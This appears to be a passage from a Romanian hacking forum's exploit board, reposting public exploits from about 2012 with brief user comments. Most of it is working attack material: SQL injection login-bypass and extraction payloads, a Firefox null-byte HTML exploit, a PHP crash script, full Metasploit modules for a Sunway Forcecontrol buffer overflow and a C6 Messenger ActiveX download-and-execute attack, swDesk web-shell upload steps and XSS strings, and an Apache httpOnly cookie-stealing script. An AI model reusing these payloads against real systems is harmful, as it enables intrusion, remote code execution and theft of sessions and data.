<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ?? ???
Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf
To-do:
IE 8 target
=endSursa: Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
-
The_Arhitect Nu te supara ca iti zic, Copy paste stie sa face multa lume.
In primul si in primul rand, daca te uiti tu mai bine , fiserul tau este un script php ... Care ce face ? Local DOS ? HAHAHA ... ASTA POTI SA FACI SI cu un while();
Daca nu am dreptate lumineaza-ma ! Te rog !
Altele apar pe parcurs.
-
mozilla firefox <= 10.0 local null byte bypass file check execution exploit
<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->
<!-- -->
<!-- Vuln risk level: Medium -->
<!-- Author: Todor Donev -->
<!-- Author mail: todor.donev@@gmail.com -->
<!-- -->
<!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->
<!-- URI with a dangerous extension.-->
<!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more -->
<!-- -->
<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->
<!-- -->
<!-- Greetz Tsvetelina Emirska again.. =) -->
<!-- -->
<html>
<body onLoad=javascript:document.form.submit()>
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">
</form>
</body>
</html>
<!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->Sursa: mozilla firefox <= 10.0 local null byte bypass file check execution exploit
-
Ce p mea deschide-ti o 100 de threaduri?
-
XRayCMS 1.1.1 SQL Injection Vulnerability
# Exploit Title: XRayCMS 1.1.1 SQL Injection Vulnerability
# Date: 2/5/2012
# Author: chap0
# Software Link: http://sourceforge.net/projects/xraycms/files/latest/download
# Version: 1.1.1
# Tested on: Ubuntu
XRay CMS is vulnerable to a SQL Injection attack which allows
authentication bypass into the admins account. If a malicious
user supplies ' or 1=1# into the applications user name field
they will be logged into the applications admin account.
Jan 29, 2012 – Contacted Vendor No Response
Feb 05, 2012 – Public Disclosure
Since the vendor did not reply we attempted to create our own
fixes for this issue. The vulnerability exist in “login2.php”
on lines 20 and 21.
17 if(!isset($_POST['username'])) header("Location: login.php?error_username");
18 if(!isset($_POST['password'])) header("Location: login.php?error_password");
19
20 $user = $_POST['username'];
21 $pass = $_POST['password'];
If the lines 20 and 21 are changed to:
$user = mysql_real_escape_string($_POST['username']);
$pass = mysql_real_escape_string($_POST['password']);
This will prevent the sql injection from happening in the user name field. -
Tube Ace(Adult PHP Tube Script) SQL Injection
# Exploit Title: Tube Ace(Adult PHP Tube Script) SQL Injection
# Date: 05/02/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Tube Ace
# http://www.tubeace.com
# Tested on: Linux
# Dork: "?viewStandard=0"
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
http://localhost/mobile/search/?q=[SQL Injection]
http://localhost/mobile/search/?q=1') AND (SELECT 9602 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,109,111,110,58),(SELECT (CASE WHEN
(9602=9602) THEN 1 ELSE 0
END)),CHAR(58,107,109,109,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a) AND ('LMEk'='LMEk&channel=
[DEMO]
http://server/mobile/search/?q=1%27%29%20AND%20%28SELECT%209602%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28CHAR%2858,109,111,110,58%29,%28SELECT%20%28CASE%20WHEN%20%289602=9602%29%20THEN%201%20ELSE%200%20END%29%29,CHAR%2858,107,109,109,58%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%28%27LMEk%27=%27LMEk&channel= -
Torrent
-
PHP 5.4.0RC6 64bit Denial of Service
<?php
/* This script generates a POST header that makes PHP 5.4.0RC6 *64 bit* try to execute code at 0x1111111111111111
(C) Copyright 2012 Stefan Esser
PHP 5.3.9 requires you to know the address of a writable address filled with NULL.
32bit requires you to create a fake 32bit Hashtable instead of a 64bit one
Because this vulnerability also allows leaking memory addresses ASLR can be "semi"-defeated. This means around 4000
tries = 4000 requests = 4000 crashes are enough to bruteforce code addresses to execute arbitrary code despite ASLR/NX
better exploit might be possible after deeper research + heap massage
This specific attack only works if there is no Suhosin-Patch -> RHEL, CentOS
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1,
__zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350)
at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398
398 ht->pDestructor(p->pData);
(gdb) i r
rax 0x7fd9583352a0 140571464389280
rbx 0x0 0
rcx 0x8 8
rdx 0x111111111111111 76861433640456465
rsi 0x7fd95a077b08 140571495070472
rdi 0x7fd9583352a0 140571464389280
rbp 0x7fff75c47ae0 0x7fff75c47ae0
rsp 0x7fff75c47a80 0x7fff75c47a80
r8 0x7fff75c47bc8 140735169199048
r9 0x1 1
r10 0x6238396661373430 7077469926293189680
r11 0x7fd962f4c8e0 140571644840160
r12 0x7fd966b91da8 140571708038568
r13 0x0 0
r14 0xffffffff00000001 -4294967295
r15 0x7fd964b10538 140571673953592
rip 0x7fd959ca5f9d 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/5i $rip
=> 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>: callq *%rdx
0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>: cmpl $0x8,-0x3c(%rbp)
0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>: jne 0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625>
0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>: mov -0x18(%rbp),%rax
0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>: mov 0x10(%rax),%rax
(gdb)
*/
$boundary = md5(microtime());
$varname = "xxx";
$payload = "";
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n\n";
$payload .= chr(16);
for ($i=1; $i<7*8; $i++) {
$payload .= chr(0);
}
for ($i=1; $i<8; $i++) {
$payload .= "\x11";
}
$payload .= chr(1);
for ($i=16+48+1; $i<128; $i++) {
$payload .= chr(0);
}
$payload .= "\n";
for ($i=0; $i<1000; $i++) {
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="aaa'.$i.'"'."\n\n";
$payload .= "aaa\n";
}
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'[]"'."\n\n";
$payload .= "aaa\n";
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'[0]"'."\n\n";
$payload .= "aaa\n";
$payload .= "--$boundary--\n";
echo "POST /index.php HTTP/1.0\n";
echo "Content-Type: multipart/form-data; boundary=$boundary\n";
echo "Content-Length: ",strlen($payload),"\n";
echo "\n";
echo "$payload";
?> -
PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow
From: cataphract
Operating system: Any
PHP version: 5.4SVN-2012-02-03 (SVN)
Package: Reproducible crash
Bug Type: Bug
Bug description:Buffer overflow on htmlspecialchars/entities with $double=false
Description:
------------
Long entities can cause a buffer overflow because the loop only guarantees
40 bytes available in beginning.
Test script:
---------------
<?php
echo
htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""',
ENT_QUOTES, 'UTF-8', false), "\n";Sursa: PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow
-
-
Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57',
'Description' => %q{
This module exploits a stack based buffer overflow found in the SNMP
NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is
triggered when sending an overly long string to the listening service
on port 2001.
},
'Author' => [
'Luigi Auriemma', # original discovery
'Rinat Ziyayev',
'James Fitts'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '49747' ],
[ 'URL', 'http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'DisableNops' => 'true',
'BadChars' => "\x0a\x0d\xae",
},
'Platform' => 'win',
'Targets' =>
[
[
# p/p/r ComDll.dll
'Windows', { 'Ret' => 0x100022c4 }
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 22 2011'))
register_options(
[
Opt::RPORT(2001)
], self.class )
end
def exploit
connect
header = "\xeb\x50\xeb\x50"
header << "\x57\x00" # packet type
header << "\xff\xff\x00\x00"
header << "\x01\x00"
header << "\xff"
footer = "\r\n"
packet = rand_text_alpha_upper(65535)
packet[0,header.length] = header
packet[293,8] = generate_seh_record(target.ret)
packet[301,20] = make_nops(20)
packet[321,payload.encoded.length] = payload.encoded
packet[65533,2] = footer
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end -
-
Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
insecure control can be abused to download and execute arbitrary files in the context of
the currently logged-on user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit
'juan vazquez' # metasploit module
],
'References' =>
[
[ 'CVE', '2008-2551' ],
[ 'OSVDB', '45960' ],
[ 'BID', '29519' ],
[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ],
],
'DefaultOptions' =>
{
'ExitFunction' => "none",
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jun 03 2008',
'DefaultTarget' => 0,
'Privileged' => false))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Only IEs are potential targets
# "File Session" is used when the ActiveX tries to request the EXE
agent = request.headers['User-Agent']
if agent !~ /MSIE \d\.\d|File Session/
print_error("Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})")
return
end
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}"
if (request.uri.match(/#{@payload_rand}/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
exe = rand_text_alpha(rand(5) + 1 )
content = %Q|
<html>
<object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
<param name="propProgressBackground" value="#bccee8">
<param name="propTextBackground" value="#f7f8fc">
<param name="propBarColor" value="#df0203">
<param name="propTextColor" value="#000000">
<param name="propWidth" value="0">
<param name="propHeight" value="0">
<param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe">
<param name="propPostDownloadAction" value="run">
<param name="propInstallCompleteUrl" value="">
<param name="propBrowserRedirectUrl" value="">
<param name="propVerbose" value="0">
<param name="propInterrupt" value="0">
</OBJECT>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
handler(cli)
end
def exploit
@payload_rand = rand_text_alpha(rand(5) + 5 )
super
end
endSursa: Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute
-
swDesk Multiple Vulnerabilities
#
# Title : swDesk Multi Vulnerability
# Author : Red Security TEAM
# Date : 01/02/2012
# Risk : High
# Vendor : http://www.swdesk.com/
# Tested On : Apache
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# I. Arbitrary File Upload Vulnerability
# 1. Go to http://server/create_ticket.php
# 2. Fil all Input Fields And Click on Submit Ticket
# 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1
# 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message
# 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed
#
# II. PHP Code Injection Vulnerability
# 1. Go to http://server/signin.php : Vulnerability Input Fields : email , password
# 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)}
#
# III. XSS Vulnerability
# 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad="
# 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search
#
# Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/
# -
Apache httpOnly Cookie Disclosure
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest(); -
Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability
Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability
# Date: 31.01.2012
# Author: Cagri Tepebasili
# Software : http://www.vastal.com/agent-zone-real-estate-script.html
# Tested on: Linux Mint 12
#####################################################################################################################
The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
Greetz : MythSEC <<<Sursa: Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability
-
1
-
HP Data Protector 6.1 EXEC_CMD Remote Code Execution
in Exploituri
Posted
HP Data Protector 6.1 EXEC_CMD Remote Code Execution
Sursa: HP Data Protector 6.1 EXEC_CMD Remote Code Execution